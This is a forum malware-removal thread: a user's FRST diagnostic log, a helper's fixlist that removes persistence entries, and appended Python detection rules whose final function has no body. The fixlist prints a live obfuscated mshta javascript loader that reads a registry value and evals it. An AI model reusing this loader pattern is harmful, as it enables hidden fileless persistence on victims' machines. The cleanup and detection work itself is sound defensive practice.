FirewallRules: [{0B10C027-D4E2-4C06-B43B-92E0276185A9}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpofxm08.exe
FirewallRules: [{BE229607-8693-4B64-8D52-9720B6991EAA}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpofxm08.exe
FirewallRules: [{67ACFD66-A831-4006-B7A6-74F0D069A9A1}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hposfx08.exe
FirewallRules: [{8435976E-B506-4E74-A47D-E58D1B85FCF2}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hposfx08.exe
FirewallRules: [{4CBFD5A1-8E3C-406C-8CC9-61AB2404648E}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hposid01.exe
FirewallRules: [{2483AB2C-6E96-4355-8E37-5DDE650DBA84}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hposid01.exe
FirewallRules: [{38335553-90E7-488E-93B7-02788E0661FD}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqscnvw.exe
FirewallRules: [{EF04561E-A5A8-4FD7-9A68-9968A587C105}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqscnvw.exe
FirewallRules: [{21CF1C03-CB9C-4F16-84CC-9DE58493BCED}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqkygrp.exe
FirewallRules: [{68CA33E2-B1CD-49B6-99F7-F9010EAED339}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqkygrp.exe
FirewallRules: [{F5C7AC42-A4C0-4B75-97DC-BE953DDE7F9F}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpzwiz01.exe
FirewallRules: [{5B10FA1B-7EF8-4410-85B8-3F48F236D6E4}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpzwiz01.exe
FirewallRules: [{55E9ABC8-2771-47EA-990F-B4B7C56B5842}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\Unload\HpqPhUnl.exe
FirewallRules: [{4F4E63D2-BCB6-46E8-A921-77B9573AE84A}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\Unload\HpqPhUnl.exe
FirewallRules: [{655593D4-F8DA-4619-91AD-A9C3EF0C896C}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpoews01.exe
FirewallRules: [{8D16E8B9-396F-49FF-88BB-39FA0800E58F}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpoews01.exe
FirewallRules: [TCP Query User{BC969F2E-A26A-41A5-9DE5-C4110098E548}C:\program files\infogrames\dirt track racing 2\dtr2.exe] => (Allow) C:\program files\infogrames\dirt track racing 2\dtr2.exe
FirewallRules: [UDP Query User{EE228C6A-765F-40A2-8799-E28A1E576A7E}C:\program files\infogrames\dirt track racing 2\dtr2.exe] => (Allow) C:\program files\infogrames\dirt track racing 2\dtr2.exe
FirewallRules: [TCP Query User{224A8567-6F09-4172-BF66-8F1CFBB8E86C}C:\users\pat\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\users\pat\appdata\local\google\chrome\application\chrome.exe
FirewallRules: [UDP Query User{416CFB8B-A0F2-4A8F-BEA2-527B543C98E5}C:\users\pat\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\users\pat\appdata\local\google\chrome\application\chrome.exe
FirewallRules: [TCP Query User{099FB426-766F-41DE-8E7A-B7549FEB7E7E}C:\program files\google\google earth\client\googleearth.exe] => (Block) C:\program files\google\google earth\client\googleearth.exe
FirewallRules: [UDP Query User{F7C915C2-6410-44A6-A2B9-CFFB27629770}C:\program files\google\google earth\client\googleearth.exe] => (Block) C:\program files\google\google earth\client\googleearth.exe
FirewallRules: [TCP Query User{491617E7-0793-4C55-A15B-E6D5CDE1EBF6}C:\program files\google\google earth\plugin\geplugin.exe] => (Block) C:\program files\google\google earth\plugin\geplugin.exe
FirewallRules: [UDP Query User{85E67114-48A6-4C6A-965A-E32AE5B6D14F}C:\program files\google\google earth\plugin\geplugin.exe] => (Block) C:\program files\google\google earth\plugin\geplugin.exe
FirewallRules: [{BF31F21F-0EB8-416F-A866-F6252A745B55}] => (Allow) LPort=80
FirewallRules: [{A67D7EC0-5595-427E-8B27-ABE80338FD44}] => (Allow) LPort=80
FirewallRules: [{F33D4EFF-4373-4554-8761-4F60032EDB9F}] => (Allow) LPort=80
FirewallRules: [TCP Query User{4AC79FDD-F559-4790-9260-684AA55654F1}C:\program files\tams11\games\farkle\farkle.exe] => (Block) C:\program files\tams11\games\farkle\farkle.exe
FirewallRules: [UDP Query User{D1829EEA-CF90-4F18-B52C-906A22ACFB7D}C:\program files\tams11\games\farkle\farkle.exe] => (Block) C:\program files\tams11\games\farkle\farkle.exe
FirewallRules: [{15FDA646-0B71-48E0-8BA5-6037E4CB6CAE}] => (Allow) C:\Program Files\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
FirewallRules: [TCP Query User{F65AE6DE-2C42-4C88-A236-1D181D9F052D}C:\program files\real\realplayer\realplay.exe] => (Block) C:\program files\real\realplayer\realplay.exe
FirewallRules: [UDP Query User{DB0FFD34-767C-46D9-9EC9-7A645BBE055E}C:\program files\real\realplayer\realplay.exe] => (Block) C:\program files\real\realplayer\realplay.exe
FirewallRules: [{2230D923-9586-4FD1-9A34-FB6FA2C9159B}] => (Allow) C:\Users\Pat\AppData\Roaming\Zoom\bin\Zoom.exe
FirewallRules: [{7DCA678F-6BA9-46D4-AA03-1B58BB3186B2}] => (Allow) C:\Program Files\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{B7C74AE3-D54C-4309-9D2C-0602DE9D8E15}] => (Allow) LPort=2869
FirewallRules: [{9ABD0812-041B-4669-8F2A-16E5B0DD6360}] => (Allow) LPort=1900
FirewallRules: [{7F064504-8E36-4190-A8C2-13D021004099}] => (Allow) C:\Program Files\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{ED75043D-726B-4E32-9490-AB8361B2CF8B}] => (Allow) C:\Program Files\Windows Live\Mesh\MOE.exe
FirewallRules: [{0A5E2D66-2F3B-44CC-91A0-DC468677F0E0}] => (Allow) C:\Program Files\HP\HP Photosmart 6520 series\Bin\DeviceSetup.exe
FirewallRules: [{F62E029E-9C15-4B37-8F6C-9655C9E7EAB2}] => (Allow) C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPNetworkCommunicator.exe
FirewallRules: [{B93AE606-A249-4038-A923-DCE3A6B2207D}] => (Allow) C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [TCP Query User{8FC61C2C-1212-428D-A4CA-C180361DED07}C:\program files\real\realplayer\realplay.exe] => (Block) C:\program files\real\realplayer\realplay.exe
FirewallRules: [UDP Query User{A277474D-BFFA-41C4-BE2C-3294C697E6D5}C:\program files\real\realplayer\realplay.exe] => (Block) C:\program files\real\realplayer\realplay.exe
FirewallRules: [{85A8648F-58AB-481A-BE30-D005A29E1C93}] => (Allow) C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
FirewallRules: [{79EDF414-9663-4A80-B368-517149062D16}] => (Allow) C:\Program Files\Lavasoft\AdAware SecureSearch Toolbar\dtUser.exe
FirewallRules: [{65A496F2-7E8F-4B44-B0F1-8780C8544656}] => (Allow) C:\Program Files\Lavasoft\AdAware SecureSearch Toolbar\dtUser.exe
FirewallRules: [TCP Query User{A03766C7-A7DC-40C7-A34B-7500CC029044}C:\users\pat\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\pat\appdata\local\google\chrome\application\chrome.exe
FirewallRules: [UDP Query User{FA1BA084-C12A-4B31-9844-4D9587BA0A41}C:\users\pat\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\pat\appdata\local\google\chrome\application\chrome.exe
FirewallRules: [TCP Query User{51D0DA18-EA08-4608-90AD-1DB33B4C78E4}C:\program files\tams11\games\farkle\farkle.exe] => (Block) C:\program files\tams11\games\farkle\farkle.exe
FirewallRules: [UDP Query User{415033F3-1E64-4C0B-B71B-82BB270B94A5}C:\program files\tams11\games\farkle\farkle.exe] => (Block) C:\program files\tams11\games\farkle\farkle.exe
FirewallRules: [TCP Query User{B2FD4157-2546-4E88-99D2-9045BAB44F9D}C:\program files\itunes\itunes.exe] => (Block) C:\program files\itunes\itunes.exe
FirewallRules: [UDP Query User{3D200F78-76DE-4EB2-8692-8C6CE30BB50C}C:\program files\itunes\itunes.exe] => (Block) C:\program files\itunes\itunes.exe
 
==================== Restore Points =========================
 
13-10-2016 05:59:13 AA11
25-10-2016 11:08:25 WinThruster Backup
29-10-2016 13:33:38 Scheduled Checkpoint
30-10-2016 06:36:51 Windows Update
01-11-2016 18:30:41 JRT Pre-Junkware Removal
03-11-2016 11:19:12 AA11
03-11-2016 11:22:37 AA11
03-11-2016 11:30:08 Removed Bing Bar
03-11-2016 11:54:18 Removed Bonjour
03-11-2016 11:56:28 Removed Browser Address Error Redirector.
03-11-2016 12:45:55 Removed QuickTime
03-11-2016 14:51:02 Removed Windows Live Mesh ActiveX Control for Remote Connections
03-11-2016 14:52:57 Removed Yahoo! Music Jukebox.
03-11-2016 15:00:46 Configured Camera Access Library
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (11/03/2016 03:07:17 PM) (Source: MsiInstaller) (EventID: 11316) (User: Pat-PC)
Description: Product: BlackBerry Desktop Software 4.3 -- Error 1316.The specified account already exists.
 
Error: (11/03/2016 03:00:43 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005.
This is often caused by incorrect security settings in either the writer or requestor process.
 
 
Operation:
   Gathering Writer Data
 
Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {07483cd7-8c2c-4f16-80ba-df154c47cdd5}
 
Error: (11/03/2016 12:59:00 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Windows\Installer\{C8E8D2E3-EF6A-4B1D-A09E-7B27EBE2F3CE}\recordingmanager.exe".
Dependent Assembly rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (11/03/2016 12:59:00 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Windows\Installer\{C8E8D2E3-EF6A-4B1D-A09E-7B27EBE2F3CE}\recordingmanager.exe".
Dependent Assembly rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (11/03/2016 11:21:42 AM) (Source: MsiInstaller) (EventID: 11310) (User: Pat-PC)
Description: Product: AdAwareInstaller -- Error 1310. Error writing to file: C:\Config.Msi\1620480.rbf.  System error 5.  Verify that you have access to that directory.
 
Error: (11/03/2016 04:59:32 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Windows\Installer\{C8E8D2E3-EF6A-4B1D-A09E-7B27EBE2F3CE}\recordingmanager.exe".
Dependent Assembly rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (11/03/2016 04:59:32 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Windows\Installer\{C8E8D2E3-EF6A-4B1D-A09E-7B27EBE2F3CE}\recordingmanager.exe".
Dependent Assembly rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (11/02/2016 08:18:37 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application esetonlinescanner_enu (1).exe, version 2.0.12.0, time stamp 0x57ac3e59, faulting module esetonlinescanner_enu (1).exe, version 2.0.12.0, time stamp 0x57ac3e59, exception code 0xc0000005, fault offset 0x001b50f3,
process id 0x1518, application start time 0x01d2353c370667d7.
 
Error: (11/02/2016 06:10:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application iexplore.exe, version 9.0.8112.16819, time stamp 0x2a425e19, faulting module unknown, version 0.0.0.0, time stamp 0x00000000, exception code 0xc0000005, fault offset 0x0ad948d8,
process id 0x1844, application start time 0x01d2356ea9d385e7.
 
Error: (11/02/2016 11:54:18 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program esetonlinescanner_enu.exe version 2.0.12.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Problem Reports and Solutions control panel.
Process ID: 1d94
Start Time: 01d2352a27e11b1d
Termination Time: 122
 
 
System errors:
=============
Error: (11/04/2016 09:01:46 AM) (Source: WMPNetworkSvc) (EventID: 14344) (User: )
Description: A new media server was not initialized because WMCreateDeviceRegistration() encountered error '0xc00d2711'. The Windows Media DRM components on your computer might be corrupted. Verify that protected files play correctly in Windows Media Player, and then restart the WMPNetworkSvc service.
 
Error: (11/04/2016 09:01:45 AM) (Source: WMPNetworkSvc) (EventID: 14344) (User: )
Description: A new media server was not initialized because WMCreateDeviceRegistration() encountered error '0xc00d2711'. The Windows Media DRM components on your computer might be corrupted. Verify that protected files play correctly in Windows Media Player, and then restart the WMPNetworkSvc service.
 
Error: (11/04/2016 09:01:15 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Windows Media Player Network Sharing Service service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.
 
Error: (11/04/2016 09:01:15 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Windows Media Player Network Sharing Service service to connect.
 
Error: (11/04/2016 08:59:14 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The HP CUE DeviceDiscovery Service service terminated with the following error: 
Unspecified error
 
Error: (11/04/2016 08:59:12 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The HP CUE DeviceDiscovery Service service hung on starting.
 
Error: (11/04/2016 08:58:55 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Pml Driver HPZ12 service terminated with the following error: 
The specified module could not be found.
 
Error: (11/04/2016 08:58:55 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Net Driver HPZ12 service terminated with the following error: 
The specified module could not be found.
 
Error: (11/04/2016 08:58:42 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID 
{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}
 to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool.
 
Error: (11/04/2016 08:58:41 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID 
{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool.
 
 
CodeIntegrity:
===================================
  Date: 2016-11-04 10:07:28.528
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-11-04 10:07:26.351
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-11-04 10:07:22.726
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-11-04 10:07:18.857
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-11-04 10:07:15.977
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-11-04 10:07:11.836
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-11-04 10:07:08.728
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-11-04 10:07:06.441
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-11-04 10:04:41.038
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-11-04 10:04:36.969
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Genuine Intel® CPU 2140 @ 1.60GHz
Percentage of memory in use: 66%
Total physical RAM: 3069.45 MB
Available physical RAM: 1028.95 MB
Total Virtual: 5055.71 MB
Available Virtual: 2462.33 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:222.79 GB) (Free:99.03 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (RECOVERY) (Fixed) (Total:10 GB) (Free:3.89 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 232.8 GB) (Disk ID: D8000000)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Not Active) - (Size=10 GB) - (Type=07 NTFS)
Partition 3: (Active) - (Size=222.8 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================

 

 





#2 nasdaq

nasdaq

  • Malware Response Team
  • 40,741 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:05:15 AM

Posted 06 November 2016 - 11:07 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can, please print this topic; it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Press the Windows key + R on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and click the OK key.
Please copy the entire contents of the code box below to a new file.
 
start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\Run: [] => [X]
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\Run: [**uxetnbtsu<*>] => "C:\Users\Pat\AppData\Local\d102cc\256774.lnk" <===== ATTENTION (Value Name with invalid characters)
Startup: C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bccb5d.lnk [2016-11-04]
ShortcutTarget: bccb5d.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d921d0.lnk [2016-09-22]
ShortcutTarget: d921d0.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
GroupPolicy: Restriction ? <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
SearchScopes: HKLM -> DefaultScope value is missing
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll => No File
Toolbar: HKU\S-1-5-21-598873941-3244639055-2830076859-1000 -> No Name - {A057A204-BACC-4D26-9990-79A187E2698E} -  No File
FF Plugin: @google.com/npPicasa2,version=2.0.0 -> C:\Program Files\Picasa2\npPicasa2.dll [No File]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-02]
S2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [X]
S2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [X]
S4 blbdrive; \SystemRoot\system32\drivers\blbdrive.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{035FBE31-3755-450A-A775-5E6BBD43D344}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.135\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{095A2EEC-F7FE-42E8-96FB-C20E53081908}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.99\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{0E55CBE1-B06A-49B6-AD8D-9EFAA0160C6F}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.57\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{218D2740-5A50-42A8-AB9F-62FF1B168782}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.69\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{29A96789-9595-4947-BEDB-0FCC776F7DB8}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.2.183.39\goopdate.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{320F0FDB-BE0A-4648-9D18-4A2C3448C007}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.79\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{38216570-5DB1-45F8-A344-B0C4E252B14B}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.26.7\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.28.1\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{62A0D750-DED9-448C-B693-406B34BB0892}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.145\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{634059C0-D264-4B2C-AE80-F73E48D33E5B}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.123\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{6D7374DE-63AA-473C-8C02-60D9CDCD84C5}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.153\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{91EFB276-CEFE-48EC-BB3A-57795A7B4008}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.149\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{A45426FB-E444-42B2-AA56-419F8FBEEC61}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.22.3\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{A54D478D-4F70-4F72-9A74-17C9986E35AB}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.165\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{b2b568c8-3712-4a75-b806-4b3c2fdb06d5}\localserver32 -> C:\Users\Pat\AppData\Local\Temp\{e9513610-f218-4dda-b954-2c7e6ba7cabb}\IDriver.NonElevated.exe => No (the data entry has 5 more characters).
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.26.9\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{C5A2122B-A05B-4FD8-AE49-91990AE10998}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.115\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.28.15\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{DB25D157-76D4-41C1-97B5-359E4A4CECEB}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.65\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{FB994D36-B312-46CE-A40B-CF63980641F9}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.111\psuser.dll => No File
Task: {53D7B34F-D449-492F-8394-5B7E046BF41C} - \WSE_Astromenda -> No File <==== ATTENTION
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\Software\Classes\a042f9: "C:\Windows\system32\mshta.exe" "javascript:aps4zK="dn4";l4n5=new ActiveXObject("WScript.Shell");rgvJb3="j";K3xch=l4n5.RegRead("HKCU\\software\\hqygkpubh\\wpazikr");Drh9rf6="en";eval(K3xch);UMuvaG1="MeHHMcMF";" <===== ATTENTION
DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Crypted
FirewallRules: [{79EDF414-9663-4A80-B368-517149062D16}] => (Allow) C:\Program Files\Lavasoft\AdAware SecureSearch Toolbar\dtUser.exe
FirewallRules: [{65A496F2-7E8F-4B44-B0F1-8780C8544656}] => (Allow) C:\Program Files\Lavasoft\AdAware SecureSearch Toolbar\dtUser.exe
C:\Users\Pat\AppData\Local\Temp\a.txt
C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bccb5d.lnk
C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d921d0.lnk
C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

Restart the computer normally to reset the registry.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

ADOBE READER
http://get.adobe.com/reader/
Before you download, I suggest you uncheck the box on the top right "Yes, install McAfee Security Scan Plus - optional"; this is not required if you are not a McAfee subscriber. While the installation is in progress you can also deny the installation of any other programs that may be suggested.
<<<>>>

ADOBE SHOCKWAVE

Navigate to this page and follow the instructions to get the latest version.
https://www.adobe.com/shockwave/welcome/

=====

Remove these old versions via the Control Panel > Programs > Programs and Features.
Adobe Reader X (10.1.16) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.16 - Adobe Systems Incorporated)
Adobe Shockwave Player (HKLM\...\Adobe Shockwave Player) (Version: 11 - Adobe Systems, Inc.)

===

Please post the Fixlog.txt file and let me know what problem persists.
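
Added example, not part of the original thread: the fixlist in the post above targets three kinds of autorun entry, namely a Run value whose name is empty or made of unusual characters, Startup shortcuts that point at mshta.exe or cmd.exe, and a registry value that makes mshta.exe read another registry value and eval it. The Python below flags those patterns in FRST-style log lines; the rule names, the host list and the "ordinary name" character set are assumptions of this example, and the last two sample lines are constructed.

```python
import re

# Hosts that run script or arbitrary commands; rarely a legitimate direct
# target of a Startup shortcut (list is an assumption of this example).
SCRIPT_HOSTS = {"mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "powershell.exe", "regsvr32.exe", "rundll32.exe"}

RUN_VALUE = re.compile(r"\\Run: \[(?P<name>.*?)\] => (?P<data>.*)$")
SHORTCUT = re.compile(r"^ShortcutTarget: (?P<lnk>.+?\.lnk) -> (?P<target>.+)$")
# Assumption: ordinary autorun value names use only these characters.
ORDINARY_NAME = re.compile(r"^[A-Za-z0-9 _.()\-]+$")


def triage_line(line):
    """Return the list of rule names that one FRST-style line triggers."""
    reasons = []

    # Rule 1: Run value with an empty name or a name made of odd characters.
    m = RUN_VALUE.search(line)
    if m and not ORDINARY_NAME.match(m.group("name")):
        reasons.append("odd-value-name")

    # Rule 2: Startup shortcut whose target is a script host or shell.
    m = SHORTCUT.match(line)
    if m:
        target = re.sub(r" \([^()]*\)$", "", m.group("target"))  # drop "(Vendor)"
        if target.rsplit("\\", 1)[-1].lower() in SCRIPT_HOSTS:
            reasons.append("script-host-shortcut")

    # Rule 3: mshta.exe given an inline javascript: command; worse when that
    # script pulls its payload from another registry value and evaluates it.
    low = line.lower()
    if "mshta" in low and "javascript:" in low:
        if "regread(" in low and "eval(" in low:
            reasons.append("registry-script-loader")
        else:
            reasons.append("inline-script-command")
    return reasons


def triage(text):
    """Return [(line_number, [rule, ...]), ...] for every flagged line."""
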